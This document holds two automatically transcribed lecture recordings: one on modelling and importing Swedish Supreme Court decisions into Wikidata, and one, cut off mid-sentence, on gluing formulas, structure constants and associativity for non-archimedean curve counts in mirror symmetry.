And so here we can see whatever the decision from the Swedish Supreme Court would look like once it was imported then. So we have it, it's a decision of the Supreme Court of Sweden. It's got a title which is set by the court. So consider this the official title. And if for some cases that are older that was not given a title by the court we just put this as no value to indicate that. So that way we don't get for example problems when we add citations to these documents otherwise we would get to constrain violation because the document doesn't have a title. It's got a language publication date, the citation, so some of the things you've seen. And then I've added here which are the judges that were part of deciding that case and we've added a little qualifier here for the reporting judge. I guess published in is kind of interesting. It's published in a special review yearbook of this court that is called so we can actually, these actually have ISBNs and stuff so they are model like a typical edition edition object. You have a link to this PDF as well. We have a majority opinion here so this has part of a majority opinion and here we come to the different types of opinions. In this case the all the five judges agreed or justices agreed and they all ruled the same so they all joined this opinion. There's not really information about who wrote an opinion in the court so we don't have an author on this in Sweden. And then we have added some citations here also which we are going to talk about much more in depth how we did later. But these are citations to Q items which I think probably represent other legal texts that we're also going to talk about later. So the actual draft legislation that was going through parliament for example. We also got a special Supreme Court case number which is a special identifier for all these cases we can use to get back to that website we saw earlier on the court. That was a brief overview John do you have any questions from the audience or anything? We have some general discussion about court cases and how they could be modeled in the case and the decisions and to be clear then we have mostly been working with the actual decisions in this import. And you were about to start with that but what we were starting to dream about why start with the court decisions is that we realized since they are so important they start sort of a chain reaction. Because the court, the Supreme Court is the ruler of how a law is going to be interpreted and then it might lead to politicians wanting to change the law if it doesn't go in the way that you thought it would be or how it was supposed to be or times has changed since the law was written perhaps by technology or society. And here we started to imagine alright so this could be the start which feeds into a political process and this is where the parliamentarian documents will take on. Yeah it's exactly right and we've seen a few cases in the last years now where these as I said the court has made decisions where the law is ambiguous and then more or less told the legislature the legislative branch that you should fix this. Do you have any examples of things this refer to or from? Maybe. I was thinking of looking at this opinion so we can see. Do you mean a court case referring to something? Not citations but... Yeah or maybe we take that in the second session with the citations. I had otherwise these sort of cause and effect things I think. 
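The item just walked through could be assembled with WikidataIntegrator roughly as follows. This is only a sketch: the Q-ids, the case-number property and the choice of P3831 (object has role) for the reporting-judge qualifier are my assumptions, not necessarily the modelling the project uses, and the exact call signatures vary a little between WikidataIntegrator versions:

    from wikidataintegrator import wdi_core, wdi_login

    statements = [
        wdi_core.WDItemID("Q0000001", prop_nr="P31"),                 # instance of: Supreme Court of Sweden decision (placeholder)
        wdi_core.WDMonolingualText("Example case name", language="sv", prop_nr="P1476"),  # title; set "no value" if the court gave none
        wdi_core.WDTime("+2019-01-01T00:00:00Z", prop_nr="P577", precision=11),           # publication date
        wdi_core.WDItemID("Q0000002", prop_nr="P1594",                # judge: one participating justice (placeholder)
                          qualifiers=[wdi_core.WDItemID("Q0000003", prop_nr="P3831",      # object has role: reporting judge (assumed modelling)
                                                        is_qualifier=True)]),
        wdi_core.WDExternalID("T 0000-00", prop_nr="P0000"),          # Supreme Court case number (placeholder property and value)
    ]

    login = wdi_login.WDLogin(user="USERNAME", pwd="PASSWORD")        # bot or user credentials
    item = wdi_core.WDItemEngine(data=statements, new_item=True)
    item.write(login)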
The example I was thinking about now is a bit too recent so I don't think we have that modeled but there was just a few weeks ago a case of a court decision that led to the government starting an inquiry into the change. Yeah. But this is an example of something a bit more difficult when it comes to modeling the different opinions and this is a model that I did not draft. It was drafted for the US Supreme Court cases and I just stole that proudly. So we got majority opinion. Here there were two justices that agreed on the majority opinion which is the main body of the text. And then there were two justices that had a dissenting opinion that meant that they wanted to rule differently in the case. They have a special opinion supporting that. And then you have a different opinion which another justice had which means that they agree with the decision but they don't agree with the reasons that were given. So they have another way to get to the same result. Alright. There is another peculiar thing here which is called an addendum which is often written by or often but sometimes written by the justices to either clarify their own position or why they voted in a specific way or they want to tell the legislator that they think it's ought to be fixed. So that's for example Stefan Linskouk who is the former, I believe he's the former Chief Justice. He was kind of famous for writing these opinions to the legislator saying that you should fix this. He wrote actually quite a lot of those. Alright. So hopefully they will show up when we're getting further into this project. And I guess maybe we can talk a little bit about the challenges of importing. You already saw that this was a PDF file that we were reading this from. So I actually didn't want to go through all of these hundreds of cases, about 100 cases every year I think, for years. I didn't want to go through all of those by hand and adding the justices. So as with the politicians one of the first things I did was actually just make sure that the whole history of justices on the Supreme Court was correct in Wikipedia and I had quite a lot of help from the Swedish Wikipedia page that had a very nice list article that I could basically scrape and import to Wikipedia. So wherever Justice was a red-linked on Wikipedia, I sort of could almost guess that it would not have a Wikipedia item either. And that helped me get them in better and it had also the period of time they were on the court and so on. So I got quite a lot of information for free that way. So once I'd done that I could write a little bit of a script that would go through and scrape those PDFs. Well it was a bit tricky because those PDFs, they aren't written to be machine readable and there's slight variations in style how you write it and it had varied a little bit over time so there was quite a lot of trials and error and in the end I got about a 5-10% error rate on them. So I would still create most of the information about the case and the item but there might be that the justices were not included or there was not all opinions were given justices that joined them and so on. So it would just let my script spit that out in the log for me and then I would sit and work through that log file after I've uploaded to like 5 years worth of cases or something and just manually go through that file. So instead of having to do 100 cases a year I could do maybe 5 or 10 and just parts of them manually. So that helped quite a lot. Now you used Wikidata integrator and custom script for doing that. 
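A minimal sketch of the PDF step described here, assuming pdfminer.six for text extraction; the closing phrase and the regular expression are only approximations of the real wording, which is exactly why a few percent of cases end up in a log for manual handling:

    import re
    from pdfminer.high_level import extract_text   # pdfminer.six

    # Decisions end with a paragraph roughly of the form (wording varies between years):
    # "I avgörandet har deltagit: justitieråden A, B, C (referent), D och E."
    PARTICIPANTS = re.compile(r"I avgörandet har deltagit[:\s]+(.*?)\.", re.S)

    def extract_justices(pdf_path):
        """Return (list of justice names, reporting judge or None) from one decision PDF."""
        match = PARTICIPANTS.search(extract_text(pdf_path))
        if match is None:
            return [], None                                   # goes into the manual-review log
        raw = match.group(1).replace("justitieråden", "")
        names = [n.strip() for n in re.split(r",| och ", raw) if n.strip()]
        reporting = next((n for n in names if "referent" in n), None)
        names = [n.replace("(referent)", "").strip() for n in names]
        if reporting:
            reporting = reporting.replace("(referent)", "").strip()
        return names, reporting

    justices, referent = extract_justices("hd_decision.pdf")  # placeholder filename
    print(justices, "reporting judge:", referent)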
And I think we also almost skipped a little bit of a step here, because you touched on it when you mentioned modelling, but I can really recommend using some sort of template or table, and there are a few different kinds that you can use. Now I'm zooming in too much, so I'm going to zoom out a little here. Maybe I skipped that because I myself did not know about this when I did it. So this is a place where collaboration on wiki is really helpful, because here we can sketch out how we think we should model this, based both on the data that we have and on how we see the properties being used in other places on Wikidata. And it's also a great place for other people to find and come with suggestions. And as I said, I think I actually sketched this out partly after the fact, after I started my imports, but it was quite useful. Maybe we have something else that is useful below there. Yes, this is a great tool called Integraality which helps you keep track of data, and here we're still trying to figure out which tables are most useful for us, but we added a few that we thought were going to be interesting, like which laws apply to these court cases. Are they citing other work? And here you can see quite a lot of these cases actually do cite other work. And then of course main subject, which can help you find the topic areas of things. We still have some work left to do on the classification. And here we see the sum so far of the number of court cases, or decisions. And with that, I think, should we move on to the parliamentarian documents? Yeah, that sounds like a good one.
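Counts like the ones on that dashboard can also be pulled directly with a query; for example, something like this counts how many of the decisions cite at least one other work via P2860 (the class Q-id is again a placeholder):

    # How many Supreme Court decisions cite at least one other work?
    DECISIONS_WITH_CITATIONS = """
    SELECT (COUNT(DISTINCT ?decision) AS ?n) WHERE {
      ?decision wdt:P31 wd:Q0000000 ;   # instance of: decision of the Supreme Court of Sweden (placeholder)
                wdt:P2860 ?cited .      # cites work
    }
    """
    # Paste into https://query.wikidata.org/ to reproduce the kind of count shown on the dashboard.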
|
Citations in Swedish Parliamentary and Judicial documents and their use
|
10.5446/51040 (DOI)
|
Thank you for coming to the last session of this mini course. Let me first share with you the files in the chat and also... Yes, so let's start. Here is where we were on Monday. The idea of the gluing formula is as follows. Roughly the gluing formula states that we can glue two open curves along two opposite boundary components and form a bigger concatenated curve like this. And the count of the concatenated curve should be the product of the counts of the two initial curves by this formula. So this is more convincing evidence that our counts really reflect open curve counting. It is also an essential ingredient in the proof of the associativity of the mirror algebra. Now let's establish this gluing formula in three steps. Step one, given two spans S1 and S2 in the essential skeleton of U, assume we have an infinite one-valent vertex W1 and an internal infinite one-valent vertex, meaning that it's mapped to the essential skeleton instead of to the boundary. So assume we have such a vertex W1 in S1 and respectively we have an internal infinite one-valent vertex W2 in S2 such that the two vertices map to the same point in the essential skeleton SKU. Next we consider a span delta with three infinite one-valent vertices W1, W2, W and mapping constantly to this point where the previous W1 and W2 go. So we consider this span which maps constantly to the same point and this span has just one three-valent vertex and three infinite legs. So we can glue this constant span delta to S1 and S2 along W1 and W2 and form a new span S like this in the essential skeleton of U. Here the infinite one-valent vertices W1 and W2 they become nodes in the new span after we glue. So in the new span this is an infinite edge containing a node and this is another infinite edge containing a node. Now we have the following M. For any curve class gamma we have the following equality that is the count associated to the span S and the curve class gamma by evaluating at this internal marked point W is equal to the sum over all the compositions of gamma into gamma 1 plus gamma 2 of the count associated to the span S1 curve class gamma 1 times the count associated to the span S2 curve class gamma 2. So for S1 we evaluate at the point W1 and for S2 we evaluate at the point W2. So this is the formula we have for the count of the glued span since this part is constant it doesn't contribute. The proof is not difficult by passing to a big enough base field extension this follows from a set theoretical decomposition of the set of skeletal curves associated to S of the left hand side to products of sets of skeletal curves associated to S1 and S2 respectively. So after big enough base field extension it reduces just to a set theoretical equality one can just check by hand. So this is the first step of gluing we glue two spines with this auxiliary spine at these infinite vertices. Now let's consider the second step of gluing. So in the second step we are given two spines S1 and S2 in the essential skeleton of U both transverse to walls and assume we have a point P1 in gamma 1 the domain of S1 and P2 in gamma 2 the domain of S2 both in the interior of some edge and we assume that they map to the same point in the essential skeleton and also they do not meet wall. Since they map to the same point we can glue so we can glue S1 and S2 along the points P1 and P2 and obtain a new transverse spine S in the essential skeleton of U like this we just glue these two together at the point P1 and P2. 
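In symbols (the notation here is mine, reconstructed from the spoken statement: N(S, gamma) denotes the count of skeletal curves associated to the spine S and the curve class gamma, with a subscript for the marked point used for evaluation), the step-one lemma reads as follows, and the lemmas in steps two and three below have exactly the same shape:

    \[
      N(S,\gamma)_{w} \;=\; \sum_{\gamma_1 + \gamma_2 = \gamma} N(S_1,\gamma_1)_{w_1}\, N(S_2,\gamma_2)_{w_2}.
    \]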
Then we have a similar lemma saying that for any curve class gamma we have the following equality which says that the count associated to the glued spine S and any curve class gamma is equal to the sum over all the compositions of gamma into gamma 1 plus gamma 2 of the count associated to the first spine S1 and the curve class gamma 1 times the count associated to the second spine S2 and the curve class gamma 2. Here is the proof for this for this equality so for the proof we add an infinite leg W to S at P because if you recall that in our definition of counts we always need some internal mark point in order to evaluate and we proved using skeletal curves we proved a symmetry theorem saying that the place where we evaluate eventually does not matter but for the just the first to construct the count we always need some internal mark point so let's add it let's add the infinite leg W to S at P at this the point we glue P and then we count this spine by evaluating at this point W and after adding this infinite leg now we can deform by stretching this point P and make appear two small edges E1 and E2 so this is a small deformation of this by stretching the point P and that now W is attached the leg W is attached to the middle of this purple of the two new purple edges and if we further stretch if we further stretch the two vertical edges E1 and E2 to make them of infinite length and contains contain a node so we make each edge infinite length to contain a node then we arrive at the gluing situation of step one and note that in this stretching process all spines are transverse so their counts do not change by deformation invariance and now we just conclude by the lemma we proved in step one we show and we conclude our proof for this equality so this is the second step to establish the gluing formula it's it uses a deformation invariance for transverse spines as well as the previous lemma that we established for the counts of such a glued span with this auxiliary with this auxiliary span delta in the middle so finally in step three for the gluing formula we are given two spines S1 S2 in the essential skeleton of you both transverse to wall like this S1 S2 and assume we have finite one valent vertices V1 in the domain gamma 1 of S1 and the V2 in the domain gamma 2 of S2 such that they map to the same point in the essential skeleton of you and we assume that we have opposite derivatives meaning that the derivative at V1 of H1 plus the derivative at V2 of H2 is zero since they have opposite derivatives and they map to the same point in the essential skeleton of you we can glue S1 and S2 along V1 and V2 and obtain a new transverse span S like this in the essential skeleton and here is the final theorem the final gluing formula for any curve class gamma we have the following equality which says that the count associated to this glued span S and any curve class gamma is equal to the sum of all the over all the compositions of gamma into gamma 1 plus gamma 2 of the count associated to the left part S1 with curve class gamma 1 times the count associated to S2 and the curve class gamma 2 so this is the final gluing formula and it is a generalization of the two dimensional case in my previous paper but here I'm presenting a more conceptual proof via deformation invariance so the proof the idea of the proof is the following so we want to prove that when we glue these two together we have this formula for the count and let's make a small extension of S1 this is our S1 we make a small extension of our S1 at 
V1 to S1 hat by linearity so we just extend linearly at this vertex V1 extend a little bit this purple part is our extension and similarly we make a small extension of S2 at V2 by linearity to S2 hat and by deformation invariance for this transverse truncated spice the count remain the same the counts do not change when we make these small extensions as long as we do not meet walls and now after making the two small extensions observe that if we glue S1 hat and S2 hat together by identifying V1 and V2 so let's glue S1 hat and S2 hat together at V1 and V2 we see that once we do that this gluing is actually just equal to the glued span S to the gluing of S with some small straight span L so this gluing S1 hat S2 hat at V1 and V2 it's just it's equal to the gluing of S this red S together with this purple purple edge L at the point V and both sides of this formula are gluing of two spans so we can so both sides are gluing of other such gluing situation of step two so we can apply step two to both sides of the above equality and we obtain this which says that the sum over all the compositions of gamma into gamma 1 and gamma 2 of the count associated to S1 hat and the gamma 1 times the count associated to this extended span this small extension S2 hat and gamma 2 is equal to the sum over all the compositions of gamma into beta 1 plus beta 2 of the count associated to S this red S and the curve class beta 1 times the count associated to the L this purple small straight span L and curve class beta 2 so now we have to let's compute explicitly the contribution of this part so we can explicitly compute that the count associated to L and the beta 2 is equal to 1 if beta 2 is 0 and it's equal to 0 otherwise and if we substitute if we substitute this explicit computation into the equality above we obtain the gluing formula in R0 sorry do you understand you have this purple interval L maps to a point is essentially the only contribution you have yeah L doesn't map to a point L map L maps to a small interval a small interval I see yeah yeah so it's really yeah it's not clear what does correspond to in simpleclic topology because you don't consider p1s but kind of like annular yeah it's yeah it's a very small annular map into a place without walls I see any walls I see yeah so that place is like just a torus so we have it's like we count annulus just in an algebraic torus yes so the count is really the simplest yeah either one if a curve class is zero or zero if it has if we put some non trivial curve class because it it's just a maps to a place without walls so there is nothing interesting happening yeah so via these three steps we obtain this gluing formula zero and let me remark that similar idea can be applied to show that our accounts are independent on the choice of the torus when we impose the toric tail condition assume we have two torus embeddings tm in you and the tm prime in you just two different embeddings leading to two different toric tail conditions t and t prime so recall that in the definition of our naive accounts of skeletal curves in order to obtain a finite dimension or modular space we need to impose some extra condition and the some extra regularity condition on the boundary via analytic continuation and that the condition called the toric tail condition was formulated according to the choice of some torus torus embedding now we want to show that it's independent of the torus embedding using the same idea in the proof of the gluing formula so assume we have two torus embeddings tm 
in you and the tm prime in you leading to two different the toric tail conditions quality and quality prime and now we consider a span s like this in the essential skeleton of you with a finite one valent vertex v so here the span s is the whole graph including the purple part this is our span s it has a finite one valent vertex v so we want to show that the count of this span s does not depend on which tail condition we impose at this end v for this let's pick w some point w very close to v and let l denote the restriction of the span s to this small interval w v so this purple interval is just a restriction of s to a small neighborhood of v and then we pick any point x in the middle of w and v and we consider the gluing of s with l so it's similar to the gluing we considered a moment ago here when we consider gluing of s and l we get like this part gets doubled it's like they're double now by step two above we obtain the following equality so here you see that we are gluing we are gluing two spans at some interior point of edges which is the situation of step two and so we can apply the formula in step two and now if we apply the formula in step two we obtain the following so the left hand side yeah so when we apply we think like this for the the left hand side is the sum over all the compositions of gamma into beta plus delta of the count associated to s using the tail condition the first the tail condition t everywhere times the count associated to l using the tail condition t prime at v and t at all at the other end of l so this left hand side so we can think of l as for the left hand side we put the toric tail condition t everywhere on s but for l we put the toric tail condition t at w but tail condition t prime at v and then we apply the step two above to this gluing now for the right hand side we just think that for the gluing we switch we switch this part of l with this part of s which means that it's the sum over all the compositions of gamma into beta plus delta of the count associated to our span s where we use the tail condition t prime at v and t in all other places now at times the count associated to this small interval l where we apply tail condition t at both ends so it's really so the left hand side as I said the difference between the left hand side and the right hand side it's how we think of the gluing it's like we are switching that half of l with that last piece of s so one piece has the toric tail condition t attached and the other piece has toric tail condition t prime attached when we switch them in this gluing we obtain and when we apply step two we obtain this we obtain this formula then this equality so now it remains to compute explicitly the computations of the small this l piece so we can compute as before that the count associated to l using the tail condition t and the curve class delta is equal to one if delta is zero and if it's equal to zero for all other delta and the same holds when we count the small interval l using toric using tail condition t prime at v and t at w the same equality the same count works also for the other one and we now we substitute we substitute this explicit computation into the equality above we obtain the following theorem for tail condition with varying torus so we have proved by substituting this explicit computation into the equality we have proved that the count associated to our spine s using tail condition t everywhere and and for some fixed class gamma is equal to the count associated to the spine s equal to the count 
associated to the spine s using tail condition t prime at v and tail condition t everywhere else these two counts are equal so here we are just switching tail condition at one vertex then of course one can switch at all other vertices and we can even apply different toric tail conditions at all finite vertices so this in other words the theorem shows that the count of skeletal curves is independent is independent is independent on the choice of the torus tm inside u so just a small remark concerning the computation for the count associated to this small interval where we put different toric tail conditions at both ends so the explicit computation for this count using two different tail conditions is a bit more subtle than for the count where we put the same tail conditions we need to use a result concerning the gluing of non-archimede polyannual in my previous paper if we put two different tail conditions because if we put the same tail condition then the count is easy it's like something yes sir you know maybe you mean that on one part of interval every put condition t prime another t but your notation your notation don't say this it's kind of like t prime everywhere yeah yeah but actually it says that it's one end is t the other end is t prime i see so i hope that it's understandable okay otherwise the notation is a bit complicated yeah so i'm saying that if at both ends we put the same tail condition then the count is easy to do because yeah yeah as maxi remarked we just map to a torus so then it's just counting something in the toric variety but if we put different tails at the two ends then the counting is a bit more complicated because it maps to some gluing of gluing of two different torus but one can show that actually one can decompose the the automorphism of the some annulus into two parts where one part can be extend can be extended to a automorphism of some disk times poly annulus and another part can be extended to automorphism of another opposite disk times the annulus so after applying this automorphism we see that we are we we are back to the previous situation just counting something in p1 times some poly annulus the computation of automorphisms of this automorphisms of the some affinoid algebra yes yeah so this is the idea for the proof of the gluing formula and also for the proof of changing tail condition and in fact this proof of changing tail condition also works if we eventually use more general tail conditions without using any embedded torus so it's easier to carry out this proof than one can imagine using like deformation variance for it feels a bit more complicated so now let's turn to the next section structure constants and associativity of mirror algebra we want to apply our gluing formula and all the other techniques we have developed so far to study structure constants and the associativity of the mirror algebra so let us recall the setting from the first lecture where we have log kala b y of variety u containing some torus tm and we have some s and c compactification of u in y we have monoid ring r over this effective curve classes assembling all possible curve classes together and the mirror algebra a it is it has basis the integer points in the essential skeleton as an arm module so this was our setup in the first lecture and again recall that given some integer points in the skeleton we write the product in the mirror algebra a as the this product of the theta functions theta p1 to theta pn in the mirror algebra a as this sum so first we sum over all 
integer points in the essential skeleton of the basis vector theta q and then we sum over all curve classes over all effective curve classes of the basis element z to the gamma it's just a notation for the basis elements and we denote the coefficient by chi p1 to pn q gamma and this chi is called the structure constants of our mirror algebra a and let's also recall how it was defined in in the first lecture the structure constant chi was defined as follows we had so first we figure out what was the class delta of the editory tail and we denote the total class beta to be gamma plus delta beta is supposed to be the class of the the closed p1 after the total tail extension we also had the z equal to the opposite of q in the essential skeleton and we had topo pz a putting p p1 to pn and z together and we use this topo pz to specify intersection numbers with the boundary then we considered the modular space this hpz beta with marked points labeled as p1 to pn zs so this is the modular space of maps of maps from p1 with marked points p1 to pn zs and we say that we specify the intersection of the p1 so it's the modular space of maps of p1 into y and we specify the intersection numbers at these marked points with the boundary d using the topo pz and we had a natural map phi from this modular space to here taking domain taking domain and evaluation at the last marked point s and we also had a special point qtodah in the identification of the target which was given as a pair of mu and q mu we give mu we just specify what was mu in the first factor corresponds to some divisory evaluation and q is just the given q so the given q is the integer point in the essential skeleton in particular it's a point in the identification of u so we had this special point qtodah and then finally we had a subspace f in the fiber of the map phi over qtodah which is a finite analytic space and if we take its length the length was by definition the structure constant kind of a in the first lecture first I give a heuristic picture of what we count for the structure constant about counting disks with some conditions on the derivative of the disk at the boundary and and after that I give a precise construction of the structure constant in using algebraic using noic median geometry so this was just a recall of what we did and the definition is quite straightforward but let's remark the following due to the choice of this specific point qtodah inside the target so we used this qtodah to take fiber and then take subspace due to the choice of this specific point the curves in f are responsible for structure constants although highly generic in the algebraic sense are in fact very special in other words non-transverse from the tropical viewpoint because this special point it's a generic point in the algebraic world but it's a very non-generic point in the tropical world so this results very generic curves in the algebraic sense but very special curves from the tropical in the tropical picture and this was convenient for giving a quick definition of structure constants but it's impractical for proving any properties about them for example associativity finiteness all these properties they are out of reach from this quick definition we must deform the curves in f into more transverse positions by perturbing this special point qtodah because when we want to prove properties for example if we want to apply the gluing formula or deformation invariance we usually need the assumption that the spines are transverse but if we do the 
count using this specific point qtodah we will not get transverse spines so we must perturb these curves by varying the point qtodah do we do it like this for a position we label the marked points of metric trees in this modular space so this is a modular space of tropical curves rational tropical curves with n plus one n plus two legs here abstract tropical curves are the same as metric trees and we label the n plus two points marked points as p1 to pn zs and let vm in the modular space be the subset consisting of metric trees whose z leg and s leg are incident to a single three valent vertex here is the picture we have such a metric tree it has a lot of legs by leg we mean infinite one valent vertex or yeah so or more precisely we mean these edges containing infinite one valent vertices so here we consider the subset where the z leg and the s leg they are incident to a single three valent vertex so the z leg and the s leg they meet first and before the tree branches to other legs yeah and we observe that this vm is is a neighborhood of this special choice of the modulus mu and next next we want to figure out a neighborhood of this special point q so let's consider a polyhedral subdivision sigma of the essential skeleton given by the set of walls in the essential skeleton here we can assume the set of walls to be finite polyhedral by bounding the degree of twigs by the fixed curve class beta so in general uh wall the set of walls they are infinitely many walls and it can be dense in the essential skeleton but if we bound some degree we get a finite set of walls so we consider the polyhedral subdivision induced by the set of walls and we let vq be the open star of the point q in sigma in other words the union of open cells in sigma whose closure contains q so we have q and we have a polyhedral decomposition we just take a cone around around the point q q might be q might lie inside a wall but it doesn't matter we take the star of q in sigma then q becomes an interior point in this open star and we said that by construction q tilde which was given as a pair mu q mu is the interior vm is a neighborhood of mu vq is enabled of q so q tilde so vm times vq is a neighborhood of q tilde inside the product of the tropical modular space and the essential skeleton and we already remarked when we talk about essential skeletons that using Tamkin's matrization theory one can show that product of skeleton is homomorphic to skeleton of product and this lies in the identification of the product yeah so using this construction we figure we figure out two natural neighborhood of sorry we figure out a natural neighborhood of the first factor of q tilde and a natural neighborhood of the second factor of q tilde so we figure out a neighborhood of q tilde i recall that our goal is to perturb the point q tilde so we will be perturbing q tilde inside this neighborhood vm times vq and now let this be the pre-image of vm times vq by the map phi analytic from this modular space by taking domain and evaluation at the last mark point s so before we took pre-image of a single point q tilde now we take pre-image of this neighborhood of q tilde and now we take curly f to be the subset in the pre-image satisfying the toric tail condition then the preposition says that phi analytic is finite at all on the neighborhood of this subset and whose degree gives the structure constant so this is how we perturb the special point q tilde into general position by allowing q tilde to vary inside this neighborhood vm times vq and we 
prove that if we allow q tilde to vary and when we impose toric tail condition then this map phi is still is good it's finite at all on the neighborhood of this f so the degree is well defined and it gives the structure constant since it's finite at all so we get a well defined degree and the the degree at the fiber over the point q tilde it was our quick definition of the structure constant so here the structure constant is reinterpreted as some degree of finite at our map and for its proof we use the toric tail preposition for almost the transverse spines because here it feels like deformation invariance that we are moving we are moving the spines for the structure constants inside this conical neighborhood but they do not state it's not always a transverse sometimes it it becomes non-transverse especially at the point of q tilde for example but we had developed this reposition in the last lecture not just for transverse spines but is that it is specially adapted to the situation here where we can go across the walls so after this perturbation into generic position now we can prove the following theorem the multiplication rule given by the structure constants chi here is commutative and associative here is the the sketch of proof commutativity is obvious because the definition of the structure constant chi is symmetric with respect to the p i's and associativity means that the product theta p1 theta p2 to theta pn does not change if we add arbitrary parentheses so let us now sketch the proof of the following equality where the left hand side means we first take product of theta p1 and the theta p2 and then we take product with theta p3 while the right hand side means we take the product theta p1 theta p2 theta p3 together using the multiplication rule so we want to prove this equality and we just rewrite the products using the multiplication rule and we substitute the multiplication rule into the equality and we see that the equality becomes equivalent to the following equality for every integer point q in the essential skeleton and every curve class gamma now observe that the right hand side of the equality star is given by accounts of skeletal curves associated to the spines of this shape where we have three infinite lags with derivatives p1 p2 p3 respectively and also we have one finite lag with the inward derivative q so three infinite lags with outward derivative p1 p2 p3 and one finite lag with inward derivative q and by the above proposition about perturbing q tilde we can deform the modulus of the domain here by stretching this point so we deform this point into a small path l and then we further stretch this path l very very long like this so if we stretch the path l very long we see that the point u near the top of the path l will map sufficiently close to the ray zero r inside the essential skeleton of u and we need it to be sufficiently close to the ray because we want it to lie inside the cone vr in the essential skeleton of u in as in the above proposition for the structure constant chi p1 p2 r eta recall that in our quick definition of structure constants we say that the marked point just go directly to the point q tilde and that was two non-transverse two rigid now we allow q tilde to move a little bit around but we still we always need it to be sufficiently close to the ray oq so it it should not move outside across some walls around this ray otherwise it doesn't give the correct structure constant so here we stretch this path l very long so that finally some point u 
By the above proposition about perturbing q̃, we can deform the modulus of the domain by stretching: we deform the relevant point into a small path ℓ, and then stretch the path ℓ very long. If we stretch ℓ long enough, a point u near the top of the path maps sufficiently close to the ray 0r inside the essential skeleton of U — and we need it sufficiently close to the ray, because we want it to lie inside the cone V_r in the essential skeleton of U, as in the above proposition for the structure constant χ(p_1, p_2, r, η). Recall that in our quick definition of the structure constants the marked point went directly to the point q̃, which was too non-transverse, too rigid; now we allow q̃ to move a little, but it must stay sufficiently close to the ray and must not cross any walls around it, otherwise it would not compute the correct structure constant. So we stretch the path ℓ very long, until some point u near the top of the path is sufficiently close to the ray 0r; that is good enough for defining the structure constant χ(p_1, p_2, r, η), so we can cut at the cross u, apply the gluing formula, and obtain the left-hand side of the equality (*). Similarly, given two spines responsible for the product on the left-hand side of (*), we can glue them to form a highly stretched spine responsible for the right-hand side. This completes the proof of associativity. Before the break, let me quickly sketch another important property of our structure constants: the convexity property. Here is the theorem. Let F be a Cartier divisor on Y, and consider an analytic disc in general position responsible for the structure constant χ(p_1, …, p_n, q, γ). Then the following hold. First, since F is a Cartier divisor we can take its tropicalization and obtain a real-valued function F^trop on the essential skeleton; then the sum of F^trop over all the p_i, minus F^trop(q), equals the intersection number of F with γ, minus the degree of the analytified F restricted to the punctured disc, meaning the disc minus all the marked points. Second, if F is nef and −F restricted to U is effective, then F^trop(q) ≤ Σ_i F^trop(p_i). Furthermore, if F is ample and −F restricted to U is effective, then the above inequality is an equality if and only if the map sends the punctured disc into the torus. The proof uses a detailed computation with semistable models of curves. The convexity theorem implies the following finiteness result. Finiteness result 1: given integer points p_1, …, p_n in the essential skeleton of U, there are at most finitely many pairs (q, γ), with q an integer point of the essential skeleton of U and γ a curve class, such that the structure constant is nonzero.
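Since the proof of the finiteness result below invokes exactly these two convexity statements, here they are in symbols; F^trop denotes the tropicalization of the Cartier divisor F, C° the punctured disc, and the degree term is the degree of the analytified F pulled back to C°, as in the statement above. The notation is mine.
\[
\text{(1)}\quad \sum_{i} F^{\mathrm{trop}}(p_i)\;-\;F^{\mathrm{trop}}(q)
\;=\;(F\cdot\gamma)\;-\;\deg\!\big(F^{\mathrm{an}}\big|_{C^{\circ}}\big),
\]
\[
\text{(2)}\quad F\ \text{nef},\ \ -F|_U\ \text{effective}
\ \Longrightarrow\
F^{\mathrm{trop}}(q)\;\le\;\sum_i F^{\mathrm{trop}}(p_i),
\]
with equality in (2), when F is ample, exactly when the punctured disc maps into the torus T_M.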
Here is a quick proof of how the finiteness follows from convexity. Since U is affine, we can find regular functions x_1, …, x_l on U such that, for every real number c, the set of points b in the essential skeleton with |x_i|(b) ≤ c for all i is bounded. Now, if a structure constant is nonzero, we apply convexity statement (2) to the Cartier divisors given by these regular functions and obtain |x_i|(q) ≤ Σ_j |x_i|(p_j); this shows that, given p_1, …, p_n, there are at most finitely many q such that the structure constant is nonzero for some γ. This bounds q; next we bound γ, since we want to bound both. The assumption that U is affine implies that there is an ample divisor F on Y such that −F restricted to U is effective. Applying convexity statement (1), the intersection number of F with γ equals Σ_i F^trop(p_i) − F^trop(q) plus the degree of the analytified F restricted to the punctured disc; since −F restricted to U is effective, this degree is non-positive, so the intersection number is at most Σ_i F^trop(p_i) − F^trop(q), and the right-hand side is fixed. This bounds γ by the ampleness of F, and that is how we deduce the finiteness result from the convexity property. The finiteness result is important because it implies that the two sums in the multiplication rule are finite sums, so the multiplication rule gives an algebra structure on the free R-module A, instead of just a formal algebra structure. In fact we have the following stronger finiteness result 2: the mirror algebra is a finitely generated R-algebra. For its proof we need to resort to the equivariant boundary torus action on the mirror algebra; due to time constraints I will omit this boundary torus action and the finite generation result in this lecture. After the break I will explain the application towards cluster algebras, and also the wall-crossing: how to get scattering diagrams from these counts of analytic curves. Let's take a five-minute break. — Okay, thank you. Here is the plan for the last part of this lecture. First, I'll explain how to construct a scattering diagram via infinitesimal analytic cylinders. Second, I'll prove the theta-function consistency property of the scattering diagram. Third, we will set all curve classes to zero, so that we no longer care about the compactification. Fourth, we will apply the above to the case of cluster algebras, where I need to introduce two new notions, C-twigs and C-walls, specifically for the cluster case. Finally, I'll explain the comparison with the work of Gross–Hacking–Keel–Kontsevich on cluster algebras. Let's start with the first part: the scattering diagram via infinitesimal analytic cylinders. Both in the original suggestions of Kontsevich–Soibelman and in the Gross–Siebert program, the construction of a mirror variety relies on the combinatorial, algorithmic construction of a scattering diagram, also known as a wall-crossing structure. Our construction of the mirror algebra by counting non-archimedean analytic discs, as in the previous lectures, completely bypasses any use of scattering diagrams. Nevertheless, our geometric approach also allows a direct construction of the scattering diagram by counting infinitesimal analytic cylinders, without the step-by-step Kontsevich–Soibelman algorithm. This has three implications: first, it gives a geometric interpretation of the combinatorial scattering diagram; second, conversely, we obtain a combinatorial way of computing the non-archimedean curve counts; third, it paves the way for the comparison with the work of Gross–Hacking–Keel–Kontsevich on cluster algebras. Let me also remark that recent works of Argüz–Gross and Gross–Siebert give another geometric interpretation of scattering diagrams, based on the theory of punctured log curves developed by Abramovich, Chen, Gross and Siebert. Now let us sketch our construction of the scattering diagram via infinitesimal analytic cylinders. Recall that we have our log Calabi–Yau U containing a torus T_M, contained in an SNC compactification Y, and we denote by N the dual of M. Definition: given a hyperplane n^⊥ in M_R = M ⊗ R, a generic point x in n^⊥ — generic meaning it is contained in no other such hyperplane, only this one — two vectors v and w in M ∖ n^⊥, and a curve class α, we 